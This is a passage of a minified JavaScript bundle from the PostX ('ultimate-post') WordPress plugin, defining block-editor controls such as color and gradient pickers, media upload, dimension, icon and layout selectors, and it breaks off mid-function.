o.gradient&&(o.gradient=A(o.gradient)),w(Object.assign({},P,o,{openColor:1},{[l]:e}))},A=e=>"object"==typeof e?"linear"==e.type?"linear-gradient("+e.direction+"deg, "+e.color1+" "+e.start+"%, "+e.color2+" "+e.stop+"%)":"radial-gradient( circle at "+e.radial+" , "+e.color1+" "+e.start+"%,"+e.color2+" "+e.stop+"%)":e||{},H=()=>(0,o.createElement)("div",{className:"active ultp-base-control-btn ultp-color2-reset-btn",onClick:()=>{M(0,"openColor")}},a.ZP?.reset_left_line);return(0,o.createElement)("div",{className:(0,i.Z)({"ultp-field-wrap ultp-field-color2":!0,"ultp-pro-field":r&&!ultp_data.active,"ultp-field-video-image":T||x,"ultp-inline-color2":S,"ultp-label-space":l})},l&&(0,o.createElement)("label",null,l,t.openColor&&T?H():(0,o.createElement)(o.Fragment,null)),(0,o.createElement)("div",{className:"ultp-sub-field"},(0,o.createElement)("div",{className:"ultp-color2-btn__group"},(0,o.createElement)(c,{contentClassName:"ultp-field-dropdown-content ultp-color2-dropdown-content",focusOnMount:!0,renderToggle:({onToggle:e,onClose:l})=>(0,o.createElement)("div",{className:"ultp-button-group"},(0,o.createElement)("button",{className:"color"==t.type&&t.openColor?"active":"",onClick:()=>{e(),M("color","type")}},__("Solid","ultimate-post"))),renderContent:()=>(0,o.createElement)("div",{className:(0,i.Z)({"ultp-popup-color-preset-content":E})},(0,o.createElement)(s.Z,{label:"Color",inline:!0,color2:!0,disableClear:!0,value:t.color||"#16d03e",onChange:e=>{M(e,"color")}}))}),(0,o.createElement)(c,{contentClassName:"ultp-field-dropdown-content ultp-color2-dropdown-content",focusOnMount:!0,renderToggle:({onToggle:e,onClose:l})=>(0,o.createElement)("div",{className:"ultp-button-group"},(0,o.createElement)("button",{className:"gradient"==t.type&&t.openColor?"active":"",onClick:()=>{e(),M("gradient","type")}},__("Gradient","ultimate-post"))),renderContent:()=>(0,o.createElement)("div",{className:(0,i.Z)({"ultp-popup-select ultp-common-popup ultp-color-container":!0,"typo-active":L,"preset-active":L||E,extraClass:!0})},(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-field-wrap ultp-color-field-tab"},(0,o.createElement)("div",{className:"ultp-field-label "+(L?"active":""),onClick:()=>I(!0)},"Preset Palette"),(0,o.createElement)("div",{className:"ultp-field-label "+(L?"":"active"),onClick:()=>I(!1)},"Custom")),(0,o.createElement)("div",{className:"ultp-color-field-options"},L?(0,o.createElement)(o.Fragment,null,B.length>0&&(0,o.createElement)("div",{className:"ultp-preset-gradient-options"},(0,o.createElement)("div",{className:"ultp-preset-label"},(0,o.createElement)("div",{className:"ultp-preset-label-content"}," ",__("PostX Gradient","ultimate-post")," "),(0,o.createElement)("div",{className:"ultp-preset-label-link",onClick:()=>(0,n.je)()}," ","Customize  >")),(0,o.createElement)("div",{className:"gradient-lists"},B.map(((e,l)=>(0,o.createElement)(b,{key:l,placement:"top",text:(0,n.nl)(e,"gradient")},(0,o.createElement)("span",{className:t.gradient==e?"active":"",key:l,onClick:()=>M(e,"gradient"),style:{background:e}}))))))):(0,o.createElement)(o.Fragment,null,(0,o.createElement)(u,{clearable:!0,__nextHasNoMargin:!0,value:"object"==typeof U?A(U):U,onChange:e=>M(e,"gradient"),gradients:C.length?C:h?h.getEditorSettings().gradients:[]})))))}),x&&(0,o.createElement)(c,{focusOnMount:!0,contentClassName:"ultp-field-dropdown-content ultp-color2-dropdown-content",renderToggle:({onToggle:e,onClose:l})=>(0,o.createElement)("div",{className:"ultp-button-group"},(0,o.createElement)("button",{className:"image"==t.type&&t.openColor?"active":"",onClick:()=>{e(),M("image","type")}},__("Image","ultimate-post"))),renderContent:()=>{var e;return(0,o.createElement)("div",{className:(0,i.Z)({"ultp-image-control--popup ultp-common-popup":!0,"preset-active":L||E})},(0,o.createElement)(v,{onSelect:e=>{e.url&&M(e.url,"image")},allowedTypes:["image"],value:t.image||"",render:({open:e})=>(0,o.createElement)("div",{className:"ultp-field-media"},(0,o.createElement)("span",{className:"ultp-media-image-item"},t.image?(0,o.createElement)("div",{className:"ultp-imgvalue-wrap"},(0,o.createElement)("input",{type:"text",className:"ultp-text-input-control",value:t.image,placeholder:"Image Url",onChange:e=>M(e.target.value,"image")}),(0,o.createElement)("span",{className:"ultp-image-close-icon dashicons dashicons-no-alt",onClick:()=>M("","image")})):(0,o.createElement)("input",{type:"text",className:"ultp-text-input-control",placeholder:"Image Url",onChange:e=>M(e.target.value,"image")}),(0,o.createElement)("div",{className:"ultp-placeholder-image"},t.image?(0,o.createElement)("div",{className:"ultp-focalpoint-wrapper"},(0,o.createElement)(y,{url:t.image,value:t.position,onDragStart:e=>M(e,"position"),onDrag:e=>M(e,"position"),onChange:e=>M(e,"position")})):(0,o.createElement)("span",{onClick:e,className:"dashicons dashicons-plus-alt2 ultp-media-upload"}))))}),(0,o.createElement)("div",{className:"ultp-popup-select"},(0,o.createElement)(g,{__nextHasNoMarginBottom:!0,label:__("Attachment","ultimate-post"),value:t.attachment,options:[{label:"Default",value:""},{label:"Scroll",value:"scroll"},{label:"fixed",value:"Fixed"}],onChange:e=>M(e,"attachment")}),(0,o.createElement)(g,{__nextHasNoMarginBottom:!0,label:__("Repeat","ultimate-post"),value:t.repeat,options:[{label:"Default",value:""},{label:"No-repeat",value:"no-repeat"},{label:"Repeat",value:"repeat"},{label:"Repeat-x",value:"repeat-x"},{label:"Repeat-y",value:"repeat-y"}],onChange:e=>M(e,"repeat")}),(0,o.createElement)(g,{__nextHasNoMarginBottom:!0,label:__("Size","ultimate-post"),value:t.size,options:[{label:"Default",value:""},{label:"Auto",value:"auto"},{label:"Cover",value:"cover"},{label:"Contain",value:"contain"}],onChange:e=>M(e,"size")})),(0,o.createElement)(s.Z,{label:"Fallback Color",value:null!==(e=t.fallbackColor)&&void 0!==e?e:t.color,onChange:e=>{M(e,"fallbackColor")}}),E&&!1)}}),T&&(0,o.createElement)(c,{focusOnMount:!0,contentClassName:"ultp-field-dropdown-content ultp-color2-dropdown-content",renderToggle:({onToggle:e,onClose:l})=>(0,o.createElement)("div",{className:"ultp-button-group"},(0,o.createElement)("button",{className:"video"==t.type&&t.openColor?"active":"",onClick:()=>{e(),M("video","type")}},__("Video","ultimate-post"))),renderContent:()=>(0,o.createElement)("div",{className:"ultp-popup-select ultp-common-popup"},(0,o.createElement)(d,{__nextHasNoMarginBottom:!0,value:t.video,placeholder:__("Only Youtube & Vimeo  & Self Hosted Url","ultimate-post"),label:__("Video URL","ultimate-post"),onChange:e=>M(e,"video")}),(0,o.createElement)(p.Z,{value:t.start||0,min:1,max:12e3,step:1,label:__("Start Time(Seconds)","ultimate-post"),onChange:e=>M(e,"start")}),(0,o.createElement)(p.Z,{value:t.end||"",min:1,max:12e3,step:1,label:__("End Time(Seconds)","ultimate-post"),onChange:e=>M(e,"end")}),(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-toggle"},(0,o.createElement)(m,{__nextHasNoMarginBottom:!0,label:__("Loop Video","ultimate-post"),checked:t.loop?1:0,onChange:e=>M(e,"loop")})),(0,o.createElement)(v,{onSelect:e=>{e.url&&M(e.url,"fallback")},allowedTypes:["image"],value:t.fallback||"",render:({open:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-field-media"},(0,o.createElement)("label",{className:"ultp-field-label"},__("Video Fallback Image","ultimate-post")),(0,o.createElement)("span",{className:"ultp-media-image-item"},t.fallback&&(0,o.createElement)("input",{className:"ultp-text-input-control",type:"text",value:t.fallback,onChange:e=>changeUrl(e)}),(0,o.createElement)("div",{className:"ultp-placeholder-image"},t.fallback?(0,o.createElement)(o.Fragment,null,(0,o.createElement)("img",{src:t.fallback,alt:"Fallback Image"}),(0,o.createElement)("span",{className:"ultp-image-close-icon dashicons dashicons-no-alt",onClick:()=>M("","fallback")})):(0,o.createElement)("span",{onClick:e,className:"dashicons dashicons-plus-alt2 ultp-media-upload"})))))}))})),t.openColor&&!T?H():(0,o.createElement)(o.Fragment,null)),r&&!ultp_data.active&&(0,o.createElement)(k,null))}},45009:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(64766),i=l(56834),n=l(58421);const{useState:r}=wp.element,s=e=>{var t;const{responsive:l,value:s,onChange:p,device:c,label:u,setDevice:d,unit:m,noLock:g,dataLabel:y}=e,[b,v]=r(null!==(t=s?.isLocked)&&void 0!==t&&t),h=e=>"object"==typeof s&&Object.keys(s).length>0?e?l?s[c]&&s[c][e]||"":s[e]:l?s[c]||"":s:"",f=(e,t)=>{let o=b&&"unit"!=t?{top:e,right:e,bottom:e,left:e}:{[t]:e};o=Object.assign({},l?s[c]||{}:s,o),o.unit=o.unit||"px";const a=Object.assign({},s,l?{[c]:o}:o,{isLocked:b});p(a)};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-dimension","data-label":u},(u||l)&&(0,o.createElement)("div",{className:"ultp-label-control"},u&&(0,o.createElement)("label",null,u),l&&(0,o.createElement)(i.Z,{setDevice:d,device:c}),m&&(0,o.createElement)(n.Z,{unit:m,value:s?l?s[c]&&s[c].unit?s[c].unit:"px":s.unit||"px":"px",setSettings:f})),(0,o.createElement)("div",{className:"ultp-dimension-input"+(g?"":" ultp-base-control-hasLock")},["top","right","bottom","left"].map(((e,t)=>(0,o.createElement)("span",{key:t,className:`ultp-${e}-dimension`},(0,o.createElement)("div",{className:"ultp-dimension-input-inner"},(0,o.createElement)("input",{type:"number",value:h(e),onChange:t=>f(t.target.value,e)}),(0,o.createElement)("span",{className:`ultp-dimension-sign ultp-dimension-position-${e}`})),(0,o.createElement)("span",{className:"ultp-dimension-label"},y?y[t]:e)))),!g&&(0,o.createElement)("button",{className:b?"active ":"",onClick:()=>v(!b)},b?(0,o.createElement)("div",null,a.ZP.link):(0,o.createElement)("div",null,a.ZP.unlink))))}},61187:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);const a=e=>{const{label:t}=e;return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-divider"},t&&(0,o.createElement)("div",{className:"ultp-field-label"},t),(0,o.createElement)("hr",null))}},77567:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(87763);const{__}=wp.i18n,{Dropdown:i}=wp.components,n=[{key:"hue",label:__("Hue","ultimate-post")},{key:"saturation",label:__("Saturation","ultimate-post")},{key:"brightness",min:0,max:200,label:__("Brightness","ultimate-post")},{key:"contrast",min:0,max:200,label:__("Contrast","ultimate-post")},{key:"invert",label:__("Invert","ultimate-post")},{key:"blur",min:0,max:50,label:__("Blur","ultimate-post")}],r=({value:e,label:t,onChange:l})=>{const r=!(!e||!e.openFilter),s=t=>e?.hasOwnProperty(t)?e[t]:"",p=(t,o)=>{l(Object.assign({},e,{[o]:t}))};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-imgfilter"},t&&(0,o.createElement)("label",null,t),(0,o.createElement)(i,{className:"ultp-range-control",renderToggle:({isOpen:e,onToggle:t})=>(0,o.createElement)("div",{className:"ultp-edit-btn"},(0,o.createElement)("div",{className:"ultp-typo-control"},r&&(0,o.createElement)("div",{className:"active ultp-base-control-btn dashicons dashicons-image-rotate",onClick:()=>{e&&t(),p(0,"openFilter")}}),(0,o.createElement)("div",{className:`${r&&"active "} ultp-icon-style`,onClick:()=>{t(),p(1,"openFilter")}},a.Z.setting))),renderContent:()=>(0,o.createElement)("div",{className:"ultp-common-popup ultp-color-popup ultp-imgfilter-range"},n.map(((e,t)=>(0,o.createElement)("div",{key:t,className:"ultp-range-input"},(0,o.createElement)("span",null,e.label),(0,o.createElement)("input",{type:"range",min:e.min||0,max:e.max||100,value:s(e.key),step:1,onChange:t=>p(t.target.value,e.key)}),(0,o.createElement)("input",{type:"number",min:e.min||0,max:e.max||100,value:s(e.key),step:1,onChange:t=>p(t.target.value,e.key)})))))}))}},68477:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(20107);const{Button:i,ButtonGroup:n}=wp.components,r=e=>{const{value:t,options:l,label:r,justify:s,disabled:p,onChange:c,inline:u}=e;return(0,o.createElement)("div",{className:(0,a.Z)({"ultp-field-wrap ultp-field-groupbutton":!0,"ultp-gbinline":u,"ultp-label-space":r})},r&&(0,o.createElement)("label",null,r),(0,o.createElement)("div",{className:"ultp-sub-field "+(s?"ultp-groupbtn-justify":"")},(0,o.createElement)(n,null,l.map(((e,l)=>(0,o.createElement)(i,{key:l,isSmall:!0,variant:e.value==t?"primary":"",onClick:()=>{return l=e.value,void c(p&&t==l?"":l);var l}},e.label))))))}},41557:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294),a=l(64766);const{Tooltip:i}=wp.components,{__}=wp.i18n,{Dropdown:n}=wp.components,{useState:r,useEffect:s}=wp.element,p=({value:e,label:t,onChange:l,inline:p,isSocial:c,dynamicClass:u,selection:d,hideFilter:m,help:g})=>{const[y,b]=r(""),[v,h]=r(""),[f,k]=r(c?{...a.dX}:{...a.ZP});s((()=>{!c&&y&&k(a._Y)}),[y]),s((()=>{d&&d.length&&k(Object.fromEntries(Object.entries(f).filter((([e])=>d?.includes(e)))))}),[d?.length]);const w=()=>{let e=Object.keys(f);return y&&(e=e.filter((e=>e.includes(y.toLowerCase())))),v&&(e=e.filter((e=>e.includes(v)))),e};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-icons"},t&&!p&&(0,o.createElement)("label",null,t),!p&&(0,o.createElement)("div",{className:"ultp-sub-field"},(0,o.createElement)(n,{popoverProps:{placement:"bottom-start"},className:"",renderToggle:({onToggle:t,onClose:a})=>(0,o.createElement)("div",{className:"ultp-icon-input"},e&&f[e]&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{onClick:()=>t()},f[e]),(0,o.createElement)("div",{className:"ultp-icon-close",onClick:()=>l("")})),(0,o.createElement)("span",{onClick:()=>t()})),renderContent:()=>(0,o.createElement)("div",{className:"ultp-sub-dropdown ultp-icondropdown-container"},(0,o.createElement)("div",{className:"ultp-search-icon"},(0,o.createElement)("input",{type:"text",placeholder:"Search Icons",onChange:e=>b(e.target.value)})),!m&&(0,o.createElement)("div",{className:"ultp-searchIcon-filter"},__("Icon Type Name","ultimate-post"),(0,o.createElement)("select",{onChange:e=>h(e.target.value)},(0,o.createElement)("option",{selected:!0,value:""},__("Show All Icon","ultimate-post")),(0,o.createElement)("option",{value:"solid"},__("Solid Icon","ultimate-post")),(0,o.createElement)("option",{value:"line"},__("Line Icon","ultimate-post")))),(0,o.createElement)("div",{className:"ultp-dropdown-icon"},w().map((t=>(0,o.createElement)("span",{onClick:()=>l(t),key:t,className:`${e==t?"active":t}`},f[t])))))})),p&&(0,o.createElement)("div",{className:"ultp-sub-dropdown ultp-icondropdown-container"},(0,o.createElement)("div",{className:"ultp-search-icon"},(0,o.createElement)("input",{type:"text",placeholder:"Search Icons",onChange:e=>b(e.target.value)})),(0,o.createElement)("div",{className:"ultp-searchIcon-filter"},__("Icon Type","ultimate-post"),(0,o.createElement)("select",{onChange:e=>h(e.target.value)},(0,o.createElement)("option",{selected:!0,value:""},__("Show All Icon","ultimate-post")),(0,o.createElement)("option",{value:"solid"},__("Solid Icon","ultimate-post")),(0,o.createElement)("option",{value:"line"},__("Line Icon","ultimate-post")))),(0,o.createElement)("div",{className:"ultp-dropdown-icon"},w().map((t=>{let a=t.replace(/([A-Z])/g," $1").replace(/[_-]/g," ").replace(/(\d)/g," $1").replace(/\b\w/g,(e=>e.toUpperCase()));return(0,o.createElement)(i,{text:a,key:t},(0,o.createElement)("span",{onClick:()=>l(t),className:`${e==t?"active":t}`},f[t]))})))),g&&g?.length>0&&(0,o.createElement)("div",{className:"ultp-sub-help"},(0,o.createElement)("i",null,g)))}},3248:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(83100);const i=e=>{const{value:t,options:l,label:i,pro:n,col:r,tab:s,onChange:p,block:c,selector:u}=e;return(0,o.createElement)("div",{className:`${u} ultp-field-wrap ultp-field-layout column-`+(r||"two"),tabIndex:0},i&&(0,o.createElement)("label",{className:"ultp-field-label"},i),(0,o.createElement)("div",{className:"ultp-field-layout-wrapper"},l.map(((e,l)=>(0,o.createElement)("div",{key:l,onClick:()=>((e,t,l)=>{const o=((e,t)=>{const l={};switch(c){case"post-grid-7":l.layout=e,l.queryNumber="layout1"==e||"layout4"==e?"4":"3";break;case"post-grid-3":l.layout=e,l.column="layout3"==e||"layout4"==e||"layout5"==e?"3":"2",l.queryNumber=5;break;case"post-grid-4":l.layout=e,l.queryNumber="layout4"==e||"layout5"==e?"4":"3";break;case"post-grid-1":t?(l.gridStyle=e,"style3"==e&&(l.columns={lg:2}),"style4"==e&&(l.columns={lg:3})):l.layout=e;break;case"post-list-1":t?(l.gridStyle=e,"style2"==e&&(l.columns={lg:2,xs:1}),"style3"==e&&(l.columns={lg:2,xs:1})):l.layout=e;break;default:l.layout=e}return l})(e,l);t?ultp_data.active?p(o):window.open((0,a.Z)("","blockProLay",ultp_data.affiliate_id,"#pricing"),"_blank"):p(o)})(e.value,e.pro,s),className:e.value==t?"ultp-field-layout-items active":"ultp-field-layout-items"},(0,o.createElement)("div",{className:`ultp-field-layout-item ${!e.pro&&"ultp-layout-free"} ${n&&ultp_data.active&&"ultp-field-layout-item-pro"}`},(0,o.createElement)("div",{className:"ultp-field-layout-content"},e.pro&&!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-field-layout-pro"},"Pro"),(0,o.createElement)("img",{src:ultp_data.url+e.img}))),e.demoImg&&(0,o.createElement)("div",{className:`ultp-layout-hover__content ultp-layout-tooltip-layout${l+1}`},(0,o.createElement)("div",{className:"ultp-layout-hover__popup"},(0,o.createElement)("img",{src:e.demoImg,alt:"Layout Popup Image"}),(0,o.createElement)("div",null,e.pro&&!ultp_data.active&&(0,o.createElement)("a",{href:(0,a.Z)("","blockUpgrade",ultp_data.affiliate_id)},"Upgrade Pro"),(0,o.createElement)("a",{href:e.demoUrl,target:"_blank",className:"view-demo",rel:"noreferrer"},"View Demo",(0,o.createElement)("span",{className:"dashicons dashicons-arrow-right-alt"}))))))))))}},69811:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(64766),i=l(83100);const{useState:n}=wp.element,r=({value:e,options:t,label:l,pro:r,tab:s,onChange:p,block:c,isInline:u})=>{const[d,m]=n(!1);return(0,o.createElement)("div",{className:"ultp-field-wrap"},(0,o.createElement)("div",{className:"ultp-field-layout2 "+(u?"ultp-field-layout2-inline":"ultp-field-layout2-block")},(0,o.createElement)("label",{className:"ultp-field-layout2-label"},l||"Layout"),(0,o.createElement)("div",{className:"ultp-field-layout2-select",onClick:()=>m((e=>!e))},t.filter((t=>t.value==e)).map(((e,t)=>(0,o.createElement)("div",{key:t,className:"ultp-field-layout2-select-items"},(0,o.createElement)("div",{className:"ultp-field-layout2-img"},(0,o.createElement)("img",{src:ultp_data.url+e.img}),e.pro&&!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-field-layout2-pro"},"Pro")),(0,o.createElement)("span",{className:"ultp-field-layout2-select-text"},e.label,(0,o.createElement)("span",{className:"ultp-field-layout2-select-icon "+(d?"ultp-dropdown-icon-rotate":"")},a.ZP.collapse_bottom_line))))),d&&(0,o.createElement)("div",{className:"ultp-field-layout2-dropdown"},t.filter((t=>t.value!=e)).map(((e,t)=>(0,o.createElement)("div",{key:t,onClick:()=>((e,t,l)=>{const o=((e,t)=>{const l={};switch(c){case"post-grid-7":l.layout=e,l.queryNumber="layout1"==e||"layout4"==e?"4":"3";break;case"post-grid-3":l.layout=e,l.column="layout3"==e||"layout4"==e||"layout5"==e?"3":"2",l.queryNumber=5;break;case"post-grid-4":l.layout=e,l.queryNumber="layout4"==e||"layout5"==e?"4":"3";break;case"post-grid-1":t?(l.gridStyle=e,"style3"==e&&(l.columns={lg:2}),"style4"==e&&(l.columns={lg:3})):l.layout=e;break;case"post-list-1":t?(l.gridStyle=e,"style2"==e&&(l.columns={lg:2,xs:1}),"style3"==e&&(l.columns={lg:2,xs:1})):l.layout=e;break;default:l.layout=e}return l})(e,l);t?ultp_data.active?p(o):window.open((0,i.Z)("https://www.wpxpo.com/postx/all-features/","blockProLay",ultp_data.affiliate_id),"_blank"):p(o)})(e.value,e.pro,s),className:"ultp-field-layout2-select-items ultp-field-layout2-dropdown-items"},(0,o.createElement)("div",{className:"ultp-field-layout2-img"},(0,o.createElement)("img",{src:ultp_data.url+e.img}),e.pro&&!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-field-layout2-pro"},"Pro")),(0,o.createElement)("span",null,e.label))))))),r&&!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-field-pro-message"},"To Unlock All Layouts"," ",(0,o.createElement)("a",{href:"https://www.wpxpo.com/postx/all-features/?utm_source=db-postx-editor&utm_medium=pro-layout&utm_campaign=postx-dashboard",target:"_blank",rel:"noreferrer"},"Upgrade Pro")))}},17024:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049);const{__}=wp.i18n,{Tooltip:i}=wp.components,{useState:n}=wp.element,r=e=>{const{text:t,value:l,label:r,placeholder:s,onlyLink:p,onChange:c,store:u,disableLink:d=!1,extraBtnAttr:m}=e,[g,y]=n(!1),{target:b,follow:v,sponsored:h,download:f}=m||{};return(0,o.createElement)("div",{className:"ultp-field-wrap "+(p?"ultp-field-selflink":"ultp-field-link-button")},r&&(0,o.createElement)("label",null,r),p?(0,o.createElement)("div",null,(0,o.createElement)("span",{className:"ultp-link-section"},(0,o.createElement)("span",{className:"ultp-link-input"},(0,o.createElement)("input",{type:"text",onChange:e=>{return t=e,void(d||c(m?t.target.value:{url:t.target.value}));var t},value:d?"Dynamic URL":m?l:l?.url,placeholder:s,disabled:d}),(m&&l||l?.url)&&(0,o.createElement)("span",{className:"ultp-image-close-icon dashicons dashicons-no-alt",onClick:()=>{c({url:""})}})),(0,o.createElement)("span",{className:"ultp-link-options"},(0,o.createElement)("span",{className:"ultp-collapse-section",onClick:()=>{y(!g)}},(0,o.createElement)("span",{className:`ultp-short-collapse ${g&&" active"}`,type:"button"})))),g&&(0,o.createElement)("div",{className:"ultp-short-content active"},(0,o.createElement)(a.T,{include:[(m&&m.target||!m)&&{position:1,data:{type:"select",key:b?.key||"btnLinkTarget",label:b?.label||__("Link Target","ultimate-post"),options:b?.options||[{value:"_self",label:__("Same Tab/Window","ultimate-post")},{value:"_blank",label:__("Open in New Tab","ultimate-post")}]}},(m&&m.follow||!m)&&{position:2,data:{type:"toggle",key:v?.key||"btnLinkNoFollow",label:v?.label||__("No Follow","ultimate-post")}},(m&&m.sponsored||!m)&&{position:3,data:{type:"toggle",key:h?.key||"btnLinkSponsored",label:h?.label||__("Sponsored","ultimate-post")}},(m&&m.download||!m)&&{position:4,data:{type:"toggle",key:f?.key||"btnLinkDownload",label:f?.label||__("Download","ultimate-post")}}],initialOpen:!0,store:u}))):(0,o.createElement)("div",{className:"ultp-sub-field"},(0,o.createElement)(i,{text:s,placement:"bottom"},(0,o.createElement)("a",{href:l,target:"_blank",rel:"noreferrer"},t))))}},3780:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(64766),i=l(69735);const{__}=wp.i18n,{MediaUpload:n}=wp.blockEditor,{useState:r}=wp.element,s=e=>{const{multiple:t,onChange:l,value:s,type:p,label:c,block:u,handleLoader:d,dcEnabled:m=!1,DynamicContent:g=null}=e,[y,b]=r({}),[v,h]=r(!1),f=o=>{if(t){const t=e.value.slice();t.splice(o,1),l(t)}else l({})},k=e=>{t||l({url:e.target.value,id:99999})};return(0,o.createElement)("div",{className:`ultp-field-wrap ultp-field-media ${v?"ultp-img-uploading":""}\n\t\t\t${c?"ultp-label-space":""}`},c&&(0,o.createElement)("label",null,c),(0,o.createElement)(n,{onSelect:e=>(e=>{if(e.id&&null==y[e?.id]&&"image-block"==u?(h(!0),d(!0),wp.apiFetch({path:"/ultp/v2/get_ultp_image_size",method:"POST",data:{id:e.id,wpnonce:ultp_data.security}}).then((t=>{b({...y,[e.id]:t?.size}),l({url:e.url,id:e.id,size:t?.size,alt:e.alt,caption:e.caption}),h(!1),d(!1)})).catch((e=>{console.log("error")}))):"image-block"==u&&(l({url:e.url,id:e.id,size:y[e?.id],alt:e.alt,caption:e.caption}),h(!1),d(!1)),t){const t=[];e.forEach((e=>{e&&e.url&&t.push({url:e.url,id:e.id,alt:e.alt,caption:e.caption})})),l(s?s.concat(t):t)}else e&&e.url&&e.id&&"image-block"!=u&&l({url:e.url,id:e.id,size:e.sizes,alt:e.alt,caption:e.caption})})(e),allowedTypes:p||["image"],multiple:t||!1,value:s,render:({open:e})=>(0,o.createElement)("div",{className:"ultp-media-img ultp-sub-field"},t?(0,o.createElement)("div",{className:"ultp-multiple-img"},s.length>0&&s.map(((e,t)=>{return(0,o.createElement)("span",{key:t,className:"ultp-media-image-item"},(0,o.createElement)("img",{src:(l=e.url,-1!=["wbm","jpg","jpeg","gif","png"].indexOf(l.split(".").pop().toLowerCase())?l:ultp_data.url+"assets/img/ultp-placeholder.jpg"),alt:__("image","ultimate-post")}),(0,o.createElement)("span",{className:"ultp-image-close-icon dashicons dashicons-no-alt",onClick:()=>f(t)}));var l})),(0,o.createElement)("div",{onClick:e,className:"ultp-placeholder-image"},(0,o.createElement)("span",null,__("Upload","ultimate-post")))):s&&s.url?(0,o.createElement)("span",{className:"ultp-media-image-item"},(0,o.createElement)("input",{type:"text",className:"ultp-text-input-control",onChange:e=>k(e),value:s.url,disabled:(0,i.o6)()&&m}),(0,o.createElement)("div",{className:"ultp-media-preview-container"},(0,o.createElement)("div",{className:"ultp-placeholder-image"},(0,o.createElement)("img",{onClick:e,src:s.url,alt:"Saved Media"}),!m&&(0,o.createElement)("span",{className:"ultp-image-close-icon",onClick:()=>f()},a.ZP.close_line),(0,o.createElement)("span",{className:"ultp-placeholder-upload-text"},__("Choose Image","ultimate-post"))),(0,i.o6)()&&g)):(0,o.createElement)("span",{className:"ultp-media-image-item"},(0,o.createElement)("input",{type:"text",className:"ultp-text-input-control",onChange:e=>k(e),value:"",disabled:(0,i.o6)()&&m}),(0,o.createElement)("div",{className:"ultp-media-preview-container"},(0,o.createElement)("div",{onClick:e,className:"ultp-placeholder-image"},(0,o.createElement)("span",{className:"ultp-media-upload-plus"},a.ZP.plus2),(0,o.createElement)("span",{className:"ultp-placeholder-upload-text"},__("Choose Image","ultimate-post"))),(0,i.o6)()&&g)))}))}},7928:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(56834),i=l(58421);const n=e=>{const{value:t,onChange:l,responsive:n,min:r,max:s,unit:p,label:c,multiple:u,setDevice:d,device:m,step:g,handleTypoFieldPresetData:y}=e,b=(e="")=>{if("unit"==e)return t?n?t["u"+m]||"px":t.unit||"px":"px";const l=t?n?t[m]||"":t.value||t:"";return y?y(l):l},v=(e,o)=>{let a=t?{...t}:{};m&&p&&!a?.hasOwnProperty("u"+m)&&(a["u"+m]="px"),"unit"==o&&n?a["u"+m]=e:(a=n?Object.assign({},t,{[m]:e}):"object"==typeof t?Object.assign({},t,{[o]:e}):e,a=r?a<r?r:a:a<0?0:a,a=s?a>s?s:a:a>1e3?1e3:a),l(a)};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-number"},(0,o.createElement)("div",{className:"ultp-field-label-responsive"},c&&(0,o.createElement)("label",null,c),n&&!u&&(0,o.createElement)(a.Z,{setDevice:d,device:m}),p&&(0,o.createElement)(i.Z,{unit:p,value:b("unit"),setSettings:v})),(0,o.createElement)("div",{className:"ultp-responsive-label ultp-field-unit"},(0,o.createElement)("input",{type:"number",step:(()=>{const e=b("unit");return"em"==e||"rem"==e?.001:g||1})(),min:r,max:s,onChange:e=>v(e.target.value,"value"),value:b()})))}},86849:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);const a=e=>{const{value:t,options:l,label:a,onChange:i,isText:n}=e;return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-radio-image"},a&&(0,o.createElement)("label",null,a),(0,o.createElement)("div",{className:"ultp-field-radio-image-content"},n?l.map(((e,l)=>(0,o.createElement)("div",{className:"ultp-field-radio-text",key:l,onClick:()=>i(e.value)},(0,o.createElement)("span",{className:e.value==t?"active":""},e.label)))):(0,o.createElement)("div",{className:"ultp-field-radio-image-items"},l.map(((e,l)=>(0,o.createElement)("div",{className:e.value==t?"ultp-radio-image active":"ultp-radio-image",key:l,onClick:()=>i(e.value)},(0,o.createElement)("img",{loading:"lazy",src:e.url})))))))}},21525:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(64766),i=l(20107),n=l(53049),r=l(83100),s=l(56834),p=l(58421);const{__}=wp.i18n,{useState:c,useRef:u,useEffect:d}=wp.element,m=e=>{const{value:t,unit:l,onChange:m,label:g,responsive:y,pro:b,device:v,setDevice:h,step:f,min:k,max:w,help:x,clientId:T,updateChild:_,_inline:C}=e,E=u(null),[S,P]=c(0);d((()=>{P(E?.current.offsetWidth||150)}),[E?.current]);const L=()=>"em"==I("unit")?.01:f||1,I=e=>"unit"==e?t?.onlyUnit?t?.unit||"px":t?y?t["u"+v]||"px":t.unit||"px":"px":t?.onlyUnit?t?._value||"":t?y?t[v]||"":t:"",B=(e,o)=>{let 